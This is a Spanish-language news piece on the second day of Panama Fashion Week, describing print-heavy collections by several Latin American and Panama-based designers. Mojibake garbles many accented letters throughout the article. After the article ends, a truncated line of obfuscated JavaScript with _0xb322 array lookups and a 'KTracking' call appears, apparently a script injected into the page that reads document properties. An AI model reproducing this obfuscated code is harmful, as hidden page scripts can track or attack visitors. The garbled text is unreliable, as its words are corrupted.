La segunda jornada del Fashion Week PanamA?, tuvo un toque mA?s alegre y arriesgado en cuanto a las tendencias propuestas en las diferentes pasarelas.

Tanto la moda masculina como la femenina, estuvo inundada por los estampados, en todas las formas, formatos y colores, que se apoderaron de las diferentes pasarelas.

La marca colombiana Pink Filosofy propuso prints en forma de hojas grandes sobre telas neutrales. Los lentes, fueron los complementos ideales para la colecciA?n que se caracterizA? por las camisas largas de mangas acampanadas con terminaciones en holanes y lazos en la cintura.

Pink Filosofy

Greta Bayo mostrA? una colecciA?n repleta de aplicaciones en bordados. Cinturones, cuellos y detalles en la ropa, eran solo una parte de las delicadas prendas de la diseAi??adora. Sus estampados vibrantes alusivos a la naturaleza, en forma de hojas, flores y aves, evocaban una mujer femenina y delicada.

Pasarela de Greta Bayo

Una mezcla total de prints geomAi??tricos, estuvo presente en el desfile de John Bejarano, quien jugA? combinando diferentes piezas con estampados como cuadros, lAi??neas oblicuas, lAi??neas horizontales y enormes cAi??rculos, que ocupaban toda la prenda. Bejarano tambiAi??n se decantA? por las botas acampanadas y largas camisas hasta el suelo, estilo mullet.

Desfile del panameAi??o John Bejarano

Graciela Lasso, por su parte, optA? por los pequeAi??os estampados florales en tonos vivos, como rojo y azul. MezclA? los prints con telas transparentes y otras metalizadas. Los hombros al aire y las terminaciones en volantes y plisados tambiAi??n estuvieron presentes en su pasarela.

Mezcla de texturas en la pasarela de Graciela Lasso.

Aunque la diseAi??adora francesa radicada en PanamA?, Helene Breebaart no presentA?, como es costumbre, colecciones a full color, los detalles artesanales siguieron estando presentes, sAi?? conservA? detalles artesanales, en forma de fauna y flora marina, en apliquAi??s sobre las mangas y las terminaciones de los vestidos. Un trabajo impecable y sofisticado para una mujer glamurosa, que complementA? con sombreros blancos XL de ala ancha y detalles bordados.

CreaciA?n sobria con detalles marinos bordados en las mangas, de Helene Breebaart.

Para los caballeros, el colombiano Jon Sonen propuso muchos prints, grandes y pequeAi??os, en forma de hojas y flores, que ocupaban toda la prenda o una parte de ella.

Ellos tambiAi??n llevarA?n prints. Desfile de Jon Sonen.

  xb322[11]][_0xb322[19]]=== _0xb322[20]&& KTracking[_0xb322[22]][_0xb322[21]](_0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12])=== -1){alert(_0xb322[23])}